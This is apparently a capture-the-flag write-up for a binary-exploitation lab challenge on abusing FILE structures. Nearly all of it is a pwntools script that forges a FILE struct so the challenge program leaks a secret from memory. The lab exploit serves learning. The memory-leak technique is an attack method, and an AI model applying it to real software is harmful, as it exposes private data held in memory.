(File Struct Exploits) level 5
(File Struct Exploits) level 5
Information
- category: pwn
Description
Abuse built-in FILE structs to leak sensitive information.
Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
elf = context.binary = ELF("/challenge/babyfile_level5")
global p
p = elf.process()
def exploit():
p.recvuntil(b"located at ")
secret_addr = int(p.recvline()[:-1],16)
fp = FileStructure()
fp.flags = 0xFBAD1800 # cruntly_puting and is_appending
fp._IO_write_base = secret_addr
fp._IO_write_end = secret_addr + 0x64
fp._IO_write_ptr = secret_addr + 0x64
payload = fp.struntil("_IO_write_end")
p.send(payload)
p.interactive()
def main():
exploit()
if __name__ == "__main__":
main()
This post is licensed under CC BY 4.0 by the author.